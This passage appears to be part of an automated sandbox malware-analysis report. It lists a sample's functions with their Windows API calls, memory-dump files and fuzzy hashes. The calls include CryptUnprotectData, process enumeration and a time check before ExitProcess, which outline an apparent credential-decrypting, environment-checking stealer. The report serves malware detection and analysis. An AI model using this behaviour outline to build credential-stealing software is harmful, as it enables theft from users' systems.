                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: Vh7$Xt$Xt$uU=$vv:
                            • API String ID: 0-611404519
                            • Opcode ID: 0e17bb1b145a6f5add32ef7ab7a36e48cd47de3c4dae5c37a5ea4c9a0d8e11b5
                            • Instruction ID: 1cc432f8d8195ea12e750e76d714af530b79c3debe14dddefd6a4dc53a278cad
                            • Opcode Fuzzy Hash: 0e17bb1b145a6f5add32ef7ab7a36e48cd47de3c4dae5c37a5ea4c9a0d8e11b5
                            • Instruction Fuzzy Hash: DFA2E5F3A082009FE304AE2DEC8567AFBE9EF94720F16493DE6C4C3744E67598458697
                            Function 005FC820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 005FC871
                            • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 005FC87C
                            • lstrcat.KERNEL32(?,00610B46), ref: 005FC943
                            • lstrcat.KERNEL32(?,00610B47), ref: 005FC957
                            • lstrcat.KERNEL32(?,00610B4E), ref: 005FC978
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$BinaryCryptStringlstrlen
                            • String ID:
                            • API String ID: 189259977-0
                            • Opcode ID: f6fa11fc8983116e6aeb8bc712271b9ff779f198be97c8e44465992bf0759db8
                            • Instruction ID: 6aebee9665c41e46bc01feba8859bffbf569520885946415bfa4bdcf1fc3540f
                            • Opcode Fuzzy Hash: f6fa11fc8983116e6aeb8bc712271b9ff779f198be97c8e44465992bf0759db8
                            • Instruction Fuzzy Hash: 3F41847590420EDBDB14DF90DD89BFEBBB8BB44304F1045B8E509A6280D7B59A84CF91
                            Function 00606920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                            Download Yara Rule
                            APIs
                            • GetSystemTime.KERNEL32(?), ref: 0060696C
                            • sscanf.NTDLL ref: 00606999
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006069B2
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006069C0
                            • ExitProcess.KERNEL32 ref: 006069DA
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Time$System$File$ExitProcesssscanf
                            • String ID:
                            • API String ID: 2533653975-0
                            • Opcode ID: d11e2544aa69da336d4170c394fd2a921d385331058f7dc37f54785ec72f6604
                            • Instruction ID: 3b2c67a7605d86faa56b4c1fb3591d007672c90dfe6ebfd003ba0c4a6c1a20d6
                            • Opcode Fuzzy Hash: d11e2544aa69da336d4170c394fd2a921d385331058f7dc37f54785ec72f6604
                            • Instruction Fuzzy Hash: 7E21CB75D14209ABCF48EFE4D945AEEB7B6BF48300F04852EE406E3250EB345615CB69
                            Function 005F7240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,00000400), ref: 005F724D
                            • RtlAllocateHeap.NTDLL(00000000), ref: 005F7254
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 005F7281
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 005F72A4
                            • LocalFree.KERNEL32(?), ref: 005F72AE
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                            • String ID:
                            • API String ID: 2609814428-0
                            • Opcode ID: 154ceb66107ed55555541f2939c01015f0ba3362a51fd4613b3e8c596ac8ed21
                            • Instruction ID: 62a960f3c3c335cb81567b5cc24a1b5479a7a345226a52150ffebfefa5a17551
                            • Opcode Fuzzy Hash: 154ceb66107ed55555541f2939c01015f0ba3362a51fd4613b3e8c596ac8ed21
                            • Instruction Fuzzy Hash: FD010075A40208BBEB14DFD4DD49FAD7B78BB44700F104558FB45BA2C0D7B0AA008B65
                            Function 00609600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0060961E
                            • Process32First.KERNEL32(00610ACA,00000128), ref: 00609632
                            • Process32Next.KERNEL32(00610ACA,00000128), ref: 00609647
                            • StrCmpCA.SHLWAPI(?,00000000), ref: 0060965C
                            • CloseHandle.KERNEL32(00610ACA), ref: 0060967A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                            • String ID:
                            • API String ID: 420147892-0
                            • Opcode ID: 9fe1f35882357387027b23c577cf1b3b20df938a5dee25d32844c5b335d479f3
                            • Instruction ID: 0ba4a3e9fcff2ce76d47a3fa26938f8d233450dc653dd5e8c55d201498130520
                            • Opcode Fuzzy Hash: 9fe1f35882357387027b23c577cf1b3b20df938a5dee25d32844c5b335d479f3
                            • Instruction Fuzzy Hash: 0B015E75A10208EBDB18DFA4CC88BEEB7FAFB48700F004598A945A7280DB359B40CF61
                            Function 00608EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                            Download Yara Rule
                            APIs
                            • CryptBinaryToStringA.CRYPT32(00000000,005F5184,40000001,00000000,00000000,?,005F5184), ref: 00608EC0
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptString
                            • String ID:
                            • API String ID: 80407269-0
                            • Opcode ID: da0f3ea3e172ade954c3bfe61ad9ee2dfc89c399074bc21f0a11151e93dd4227
                            • Instruction ID: 7a38d8cd58af81bb6fcd5134fa65f9ff635d469783ee7ce6b56663b582a95894
                            • Opcode Fuzzy Hash: da0f3ea3e172ade954c3bfe61ad9ee2dfc89c399074bc21f0a11151e93dd4227
                            • Instruction Fuzzy Hash: 3A112E70240205FFDB08CF64D885FAB37AABF89340F109858F9958B290DB75EC41DB64
                            Function 00607A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0140DA28,00000000,?,00610E10,00000000,?,00000000,00000000), ref: 00607A63
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00607A6A
                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0140DA28,00000000,?,00610E10,00000000,?,00000000,00000000,?), ref: 00607A7D
                            • wsprintfA.USER32 ref: 00607AB7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                            • String ID:
                            • API String ID: 3317088062-0
                            • Opcode ID: 18abc3e301ccf51fc3fdcce1d1fa1a7fded4bb2837d0828bb86e16e9b4ba1de7
                            • Instruction ID: 5848c16ecc32e0b200eab24569c5bf39840b3f02f693edd0ea623b8394bef455
                            • Opcode Fuzzy Hash: 18abc3e301ccf51fc3fdcce1d1fa1a7fded4bb2837d0828bb86e16e9b4ba1de7
                            • Instruction Fuzzy Hash: 0F118EB1E45218EBEB248B54DC49FAAB778FB44721F1047AAE90A932C0D7745A44CF51
                            Function 009C2B65 Relevance: 4.8, Strings: 3, Instructions: 1046COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: NoV*$rH)"$t~o
                            • API String ID: 0-3807339736
                            • Opcode ID: c4c50535b397d73ec05be903c8bf425d6334d5b5579b3b98e313b4e6f1828320
                            • Instruction ID: 8d288a5f433b8d7b2749cebfb0f87bff3a094014a6feac7e0fa4b20f10136214
                            • Opcode Fuzzy Hash: c4c50535b397d73ec05be903c8bf425d6334d5b5579b3b98e313b4e6f1828320
                            • Instruction Fuzzy Hash: D4620AF360C2009FE3046E2DEC8567ABBE9EFD4720F1A493DEAD4C7744EA3558058696
                            Function 00603720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                            Download Yara Rule
                            APIs
                            • CoCreateInstance.COMBASE(0060E118,00000000,00000001,0060E108,00000000), ref: 00603758
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 006037B0
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharCreateInstanceMultiWide
                            • String ID:
                            • API String ID: 123533781-0
                            • Opcode ID: f08f73b8fab077098040f27f52803288e90ad7dbf2f777dc0e4dfe5e39f6cf1a
                            • Instruction ID: d91ad17608b6e45061ecf99763ad4c44be1c53df217fc368f7b0253edb9aa330
                            • Opcode Fuzzy Hash: f08f73b8fab077098040f27f52803288e90ad7dbf2f777dc0e4dfe5e39f6cf1a
                            • Instruction Fuzzy Hash: 5041C770A40A289FDB28DF58CC95B9BB7B5BB48702F4081D9E609A72D0D7B16E85CF50
                            Function 005F9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 005F9B84
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 005F9BA3
                            • LocalFree.KERNEL32(?), ref: 005F9BD3
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$AllocCryptDataFreeUnprotect
                            • String ID:
                            • API String ID: 2068576380-0
                            • Opcode ID: 218ca62f8686010c7adc33421080dc63d7f7b1dd81d0164c59f47aa4a93494e6
                            • Instruction ID: b051477b1e7d612ef6c9027d82bae724db57769ec9cf4f5641b193d9f168d58d
                            • Opcode Fuzzy Hash: 218ca62f8686010c7adc33421080dc63d7f7b1dd81d0164c59f47aa4a93494e6
                            • Instruction Fuzzy Hash: 8A11C9B8A00209EFDB04DF94D985AAEB7B5FF88301F1045A8ED15A7350D774AE10CFA1
                            Function 009BD37C Relevance: 4.1, Strings: 2, Instructions: 1578COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: ASWy$b<qg
                            • API String ID: 0-1408985611
                            • Opcode ID: 46e263db9e43447fbe83603cc6b0752b48526534dc7f93c2b49061154a1ac803
                            • Instruction ID: fd1c29d37445d58bb1ad4e5038b637891c369aa39d9b2f505cbf311d58779db4
                            • Opcode Fuzzy Hash: 46e263db9e43447fbe83603cc6b0752b48526534dc7f93c2b49061154a1ac803
                            • Instruction Fuzzy Hash: 70B2F6F39082109FE304AE2DEC9567AFBE5EF94320F164A3DEAC4D3744EA3558058697
                            Function 009BB91A Relevance: 4.1, Strings: 2, Instructions: 1574COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
